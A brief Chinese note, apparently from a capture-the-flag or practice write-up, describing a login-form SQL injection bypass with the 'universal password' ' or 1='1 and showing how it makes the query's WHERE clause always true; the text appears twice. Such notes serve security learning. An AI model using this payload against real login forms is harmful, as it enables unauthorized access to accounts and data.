给了我们一个登入框,先试试万能密码能不能成功
用户名:1
密码:' or 1='1
原理:1.select * from users where username='user' and password='pwd'
2.select * from users where username='1'and password=' 'or 1='1' 相当于select * from users where '1'='1'
给了我们一个登入框,先试试万能密码能不能成功
用户名:1
密码:' or 1='1
原理:1.select * from users where username='user' and password='pwd'
2.select * from users where username='1'and password=' 'or 1='1' 相当于select * from users where '1'='1'